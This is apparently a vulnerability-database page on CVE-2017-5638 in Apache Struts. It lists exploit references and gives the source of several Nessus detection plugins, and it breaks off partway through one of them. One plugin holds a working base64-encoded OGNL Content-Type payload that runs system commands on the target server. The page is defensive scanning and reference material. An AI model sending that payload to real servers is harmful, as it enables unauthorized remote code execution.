Vulnerabilities > CVE-2017-5638 - Improper Handling of Exceptional Conditions vulnerability in multiple products

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
apache
ibm
lenovo
hp
oracle
arubanetworks
netapp
CWE-755
critical
nessus
exploit available
metasploit

Summary

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Vulnerable Configurations

Part Description Count
Application
Apache
62
Application
Hp
5
Application
Oracle
4
Application
Arubanetworks
55
Application
Netapp
1
OS
Ibm
6
OS
Lenovo
2
Hardware
Ibm
3
Hardware
Lenovo
1

Exploit-Db

  • descriptionApache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit). CVE-2017-5638. Remote exploit for Multiple platform. Tags: Metasploit Framework
    fileexploits/multiple/remote/41614.rb
    idEDB-ID:41614
    last seen2017-03-15
    modified2017-03-15
    platformmultiple
    port8080
    published2017-03-15
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/41614/
    titleApache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)
    typeremote
  • descriptionApache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution. CVE-2017-5638. Webapps exploit for Linux platform
    fileexploits/linux/webapps/41570.py
    idEDB-ID:41570
    last seen2017-03-10
    modified2017-03-07
    platformlinux
    port
    published2017-03-07
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/41570/
    titleApache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution
    typewebapps

Metasploit

descriptionThis module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.
idMSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL
last seen2020-06-04
modified2019-06-24
published2017-03-09
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_content_type_ognl.rb
titleApache Struts Jakarta Multipart Parser OGNL Injection

Nessus

  • NASL familyWindows
    NASL idORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL
    descriptionOracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities. - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501) - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Server). An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542) - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary commands. (CVE-2017-5638) In addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution, denial of service, information disclosure, and other unspecified vulnerabilities. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application
    last seen2020-06-05
    modified2020-06-01
    plugin id136998
    published2020-06-01
    reporterThis script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/136998
    titleOracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include('compat.inc');
    
    if (description)
    {
      script_id(136998);
      script_version("1.3");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/07/27");
    
      script_cve_id(
        "CVE-2015-7501",
        "CVE-2016-0714",
        "CVE-2017-3540",
        "CVE-2017-3541",
        "CVE-2017-3542",
        "CVE-2017-3543",
        "CVE-2017-3545",
        "CVE-2017-3554",
        "CVE-2017-3591",
        "CVE-2017-3593",
        "CVE-2017-3594",
        "CVE-2017-3595",
        "CVE-2017-3596",
        "CVE-2017-3597",
        "CVE-2017-3598",
        "CVE-2017-3602",
        "CVE-2017-3603",
        "CVE-2017-5638"
      );
      script_xref(name:"IAVA", value:"2017-A-0113");
    
      script_name(english:"Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)");
    
      script_set_attribute(attribute:"synopsis", value:
    "An application running on the remote host is affected by multiple security vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities.
    
      - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent:
        Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted
        serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501)
    
      - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
        (subcomponent: Server). An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access
        to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized
        update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability
        to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542)
    
      - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent:
        Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during
        file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type,
        Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary
        commands. (CVE-2017-5638)
    
    In addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution,
    denial of service, information disclosure, and other unspecified vulnerabilities. Note that Nessus has not attempted to
    exploit these issues but has instead relied only on the application's self-reported version number.");
      script_set_attribute(attribute:"see_also", value:"https://www.oracle.com/security-alerts/cpuapr2017.html");
      script_set_attribute(attribute:"solution", value:
    "Apply the appropriate patch according to the April 2017 Oracle Critical Patch Update advisory.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/18");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/04/18");
      script_set_attribute(attribute:"plugin_publication_date", value:"2020/06/01");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
      script_set_attribute(attribute:"stig_severity", value:"I");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("oracle_webcenter_sites_installed.nbin");
      script_require_keys("SMB/WebCenter_Sites/Installed");
    
      exit(0);
    }
    
    port = get_kb_item('SMB/transport');
    if (isnull(port))
      port = 445;
    
    get_kb_item_or_exit('SMB/WebCenter_Sites/Installed');
    
    versions = get_kb_list('SMB/WebCenter_Sites/*/Version');
    if (isnull(versions)) exit(1, 'Unable to obtain a version list for Oracle WebCenter Sites.');
    
    report = '';
    
    foreach key (keys(versions))
    {
      fix = '';
    
      version = versions[key];
      revision = get_kb_item(key - '/Version' + '/Revision');
      path = get_kb_item(key - '/Version' + '/Path');
    
      if (isnull(version) || isnull(revision)) continue;
    
      # Patch 25883419 - 11.1.1.8.0 < Revision 184000 
      if (version =~ "^11\.1\.1\.8\.0$" && revision < 184000)
      {
        fix = '\n  Fixed revision : 184000' +
              '\n  Required patch : 25883419';
      }
      # Patch 25806935 - 12.2.1.0.0 < Revision 184040 
      else if (version =~ "^12\.2\.1\.0\.0$" && revision < 184040)
      {
        fix = '\n  Fixed revision : 184040' +
              '\n  Required patch : 25806935';
      }
      # Patch 25806943 - 12.2.1.1.0 < Revision 184025 
      else if (version =~ "^12\.2\.1\.1\.0$" && revision < 184025)
      {
        fix = '\n  Fixed revision : 184025' +
              '\n  Required patch : 25806943';
      }
      # Patch 25806946 - 12.2.1.2.0 < Revision 184026 
      else if (version =~ "^12\.2\.1\.2\.0$" && revision < 184026)
      {
        fix = '\n  Fixed revision : 184026' +
              '\n  Required patch : 25806946';
      }
    
      if (fix != '')
      {
        if (!isnull(path)) report += '\n  Path           : ' + path;
        report += '\n  Version        : ' + version +
                  '\n  Revision       : ' + revision +
                  fix + '\n';
      }
    }
    
    if (report != '') security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);
    else audit(AUDIT_INST_VER_NOT_VULN, "Oracle WebCenter Sites");
    
  • NASL familyCGI abuses
    NASL idSTRUTS_2_5_10_1_RCE.NASL
    descriptionThe version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.
    last seen2020-06-01
    modified2020-06-02
    plugin id97610
    published2017-03-08
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97610
    titleApache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(97610);
      script_version("1.21");
      script_cvs_date("Date: 2019/11/13");
    
      script_cve_id("CVE-2017-5638");
      script_bugtraq_id(96729);
      script_xref(name:"CERT", value:"834067");
      script_xref(name:"EDB-ID", value:"41570");
      script_xref(name:"EDB-ID", value:"41614");
    
      script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)");
      script_summary(english:"Attempts to execute arbitrary commands on the remote web server.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a web application that uses a Java
    framework that is affected by a remote code execution vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The version of Apache Struts running on the remote host is affected by
    a remote code execution vulnerability in the Jakarta Multipart parser
    due to improper handling of the Content-Type header. An
    unauthenticated, remote attacker can exploit this, via a specially
    crafted Content-Type header value in the HTTP request, to potentially
    execute arbitrary code, subject to the privileges of the web server
    user.");
      script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html");
      # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654");
      script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1");
      script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
    Alternatively, apply the workaround referenced in the vendor advisory.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
      script_set_attribute(attribute:"in_the_news", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/08");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("http_version.nasl", "webmirror.nasl");
      script_require_ports("Services/www", 80, 8080);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("http.inc");
    include("misc_func.inc");
    
    port = get_http_port(default:8080);
    cgis = get_kb_list('www/' + port + '/cgi');
    
    urls = make_list('/');
    
    # To identify actions that we can test the exploit on we will look
    # for files with the .action / .jsp / .do suffix from the KB.
    if (!isnull(cgis))
    {
      foreach cgi (cgis)
      {
        match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi);
        if (match)
        {
          urls = make_list(urls, match[0]);
          if (!thorough_tests) break;
        }
        match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi);
        if (!isnull(match2))
        {
          urls = make_list(urls, match2[0]);
          if (!thorough_tests) break;
        }
        match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi);
        if (!isnull(match3))
        {
          urls = make_list(urls, match3[0]);
          if (!thorough_tests) break;
        }
        if (cgi =~ "struts2?(-rest)?-showcase")
        {
          urls = make_list(urls, cgi);
          if (!thorough_tests) break;
        }
      }
    }
    if (thorough_tests)
    {
      cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');
      if (!isnull(cgi2)) urls = make_list(urls, cgi2);
    
      cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');
      if (!isnull(cgi3)) urls = make_list(urls, cgi3);
    
      cgi4 = get_kb_list('www/' + port + '/content/extensions/do');
      if (!isnull(cgi4)) urls = make_list(urls, cgi4);
    }
    
    urls = list_uniq(urls);
    
    vuln = FALSE;
    
    rand_var = rand_str(length:8);
    header_payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','" + rand_var + "')}.multipart/form-data";
    headers_1 = make_array("Content-Type", header_payload);
    
    # The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV
    # vendors.
    # {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))
    exploit = "JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX";
    exploit += "h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ";
    exploit += "lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w";
    exploit += "aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb";
    exploit += "D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi";
    exploit += "5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t";
    exploit += "hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz";
    exploit += "KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja";
    exploit += "XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG";
    exploit += "9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N";
    exploit += "tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn";
    exploit += "fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL";
    exploit += "nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS";
    exploit += "4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB";
    exploit += "nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv";
    exploit += "bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI";
    exploit += "3JvcykpLigjcm9zLmZsdXNoKCkpfQo=";
    
    headers_2 = make_array("Content-Type", chomp(base64_decode(str:exploit)));
    
    # Since struts apps could be taking longer
    timeout = get_read_timeout() * 2;
    if(timeout < 10)
      timeout = 10;
    http_set_read_timeout(timeout);
    
    foreach url (urls)
    {
      ############################################
      # Method 1
      ############################################
      res = http_send_recv3(
        method       : "GET",
        item         : url,
        port         : port,
        add_headers  : headers_1,
        exit_on_fail : TRUE
      );
      if ( ("X-Tenable: "+ rand_var ) >< res[1] )
        vuln = TRUE;
      # Stop after first vulnerable Struts app is found
      if (vuln) break;
    
      ############################################
      # Method 2
      ############################################
    
      cmd_pats = make_array();
      cmd_pats['id'] = "uid=[0-9]+.*\sgid=[0-9]+.*";
      cmd_pats['ipconfig'] = "Subnet Mask|Windows IP|IP(v(4|6)?)? Address";
    
      res = http_send_recv3(
        method       : "GET",
        item         : url,
        port         : port,
        add_headers  : headers_2,
        exit_on_fail : TRUE
      );
    
      if ("Windows IP" >< res[2] || "uid" >< res[2])
      {
        if (pgrep(pattern:cmd_pats['id'], string:res[2]))
        {
          output = strstr(res[2], "uid");
          if (!empty_or_null(output))
          {
            vuln = TRUE;
            vuln_url = build_url(qs:url, port:port);
            break;
          }
        }
        else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))
        {
          output = strstr(res[2], "Windows IP");
          if (!empty_or_null(output))
          {
            vuln = TRUE;
            vuln_url = build_url(qs:url, port:port);
            break;
          }
        }
      }
    }
    
    
    if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');
    
    security_report_v4(
      port       : port,
      severity   : SECURITY_HOLE,
      generic    : TRUE,
      request    : make_list(http_last_sent_request()),
      output     : chomp(output)
    );
    
  • NASL familyMisc.
    NASL idSTRUTS_2_5_10_1_WIN_LOCAL.NASL
    descriptionThe version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code. Note that Nessus has not tested for this issue but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id97576
    published2017-03-07
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97576
    titleApache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(97576);
      script_version("1.21");
      script_cvs_date("Date: 2019/11/13");
    
      script_cve_id("CVE-2017-5638");
      script_bugtraq_id(96729);
      script_xref(name:"CERT", value:"834067");
      script_xref(name:"EDB-ID", value:"41570");
      script_xref(name:"EDB-ID", value:"41614");
    
      script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)");
      script_summary(english:"Checks the Struts 2 version.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote host contains a web application that uses a Java framework
    that is affected by a remote code execution vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The version of Apache Struts running on the remote host is 2.3.5
    through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,
    affected by a remote code execution vulnerability in the Jakarta
    Multipart parser due to improper handling of the Content-Type,
    Content-Disposition, and Content-Length headers. An unauthenticated,
    remote attacker can exploit this, via a specially crafted header value
    in the HTTP request, to potentially execute arbitrary code.
    
    Note that Nessus has not tested for this issue but has instead relied
    only on the application's self-reported version number.");
      script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html");
      # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654");
      script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1");
      script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32");
      script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045");
      script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-046");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
    Alternatively, apply the workaround referenced in the vendor advisory.");
      script_set_attribute(attribute:"agent", value:"all");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
      script_set_attribute(attribute:"in_the_news", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/07");
    
      script_set_attribute(attribute:"potential_vulnerability", value:"true");
      script_set_attribute(attribute:"plugin_type", value:"combined");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("os_fingerprint.nasl", "struts_detect_win.nbin", "struts_detect_nix.nbin", "struts_config_browser_detect.nbin");
      script_require_keys("Settings/ParanoidReport");
      script_require_ports("installed_sw/Apache Struts", "installed_sw/Struts");
    
      exit(0);
    }
    
    include("vcf.inc");
    
    if (report_paranoia < 2) audit(AUDIT_PARANOID);
    
    
    app_info = vcf::combined_get_app_info(app:"Apache Struts");
    
    vcf::check_granularity(app_info:app_info, sig_segments:2);
    
    constraints = [
      { "min_version" : "2.3.5", "max_version" : "2.3.31", "fixed_version" : "2.3.32" },
      { "min_version" : "2.5", "max_version" : "2.5.10", "fixed_version" : "2.5.10.1" }
    ];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
    
    
  • NASL familyMisc.
    NASL idORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL
    descriptionThe version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the Apache Struts component due to improper handling of multithreaded access to an ActionForm instance. An unauthenticated, remote attacker can exploit this, via a specially crafted multipart request, to execute arbitrary code or cause a denial of service condition. (CVE-2016-1181) - An unspecified flaw exists in the Web Services subcomponent that allows an unauthenticated, remote attacker to modify or delete arbitrary data accessible to the server. (CVE-2017-3506) - A remote code execution vulnerability exists in the Web Container subcomponent due to improper handling of reflected PartItem File requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-3531) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)
    last seen2020-06-01
    modified2020-06-02
    plugin id99528
    published2017-04-21
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99528
    titleOracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(99528);
      script_version("1.12");
      script_cvs_date("Date: 2019/11/13");
    
      script_cve_id(
        "CVE-2016-1181",
        "CVE-2017-3506",
        "CVE-2017-3531",
        "CVE-2017-5638"
      );
      script_bugtraq_id(
        91068,
        91787,
        96729,
        97884
      );
      script_xref(name:"CERT", value:"834067");
      script_xref(name:"EDB-ID", value:"41570");
      script_xref(name:"EDB-ID", value:"41614");
      script_xref(name:"TRA", value:"TRA-2017-16");
      script_xref(name:"ZDI", value:"ZDI-16-444");
    
      script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)");
      script_summary(english:"Checks for the patch.");
    
      script_set_attribute(attribute:"synopsis", value:
    "An application server installed on the remote host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Oracle WebLogic Server installed on the remote host is
    affected by multiple vulnerabilities :
    
      - A remote code execution vulnerability exists in the
        Apache Struts component due to improper handling of
        multithreaded access to an ActionForm instance. An
        unauthenticated, remote attacker can exploit this, via a
        specially crafted multipart request, to execute
        arbitrary code or cause a denial of service condition.
        (CVE-2016-1181)
    
      - An unspecified flaw exists in the Web Services
        subcomponent that allows an unauthenticated, remote
        attacker to modify or delete arbitrary data accessible
        to the server. (CVE-2017-3506)
    
      - A remote code execution vulnerability exists in the Web
        Container subcomponent due to improper handling of
        reflected PartItem File requests. An unauthenticated,
        remote attacker can exploit this, via a specially
        crafted request, to execute arbitrary code.
        (CVE-2017-3531)
    
      - A remote code execution vulnerability exists in the
        Apache Struts component in the Jakarta Multipart parser
        due to improper handling of the Content-Type,
        Content-Disposition, and Content-Length headers.
        An unauthenticated, remote attacker can exploit this,
        via a specially crafted header value in the HTTP
        request, to execute arbitrary code. (CVE-2017-5638)");
      # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?623d2c22");
      # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?eb4db3c7");
      script_set_attribute(attribute:"see_also", value:"https://support.oracle.com/rs?type=doc&id=2228898.1");
      script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2017-16");
      script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-16-444/");
      script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html");
      # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654");
      script_set_attribute(attribute:"solution", value:
    "Apply the appropriate patch according to the April 2017 Oracle
    Critical Patch Update advisory.");
      script_set_attribute(attribute:"agent", value:"all");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:ND");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:X");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
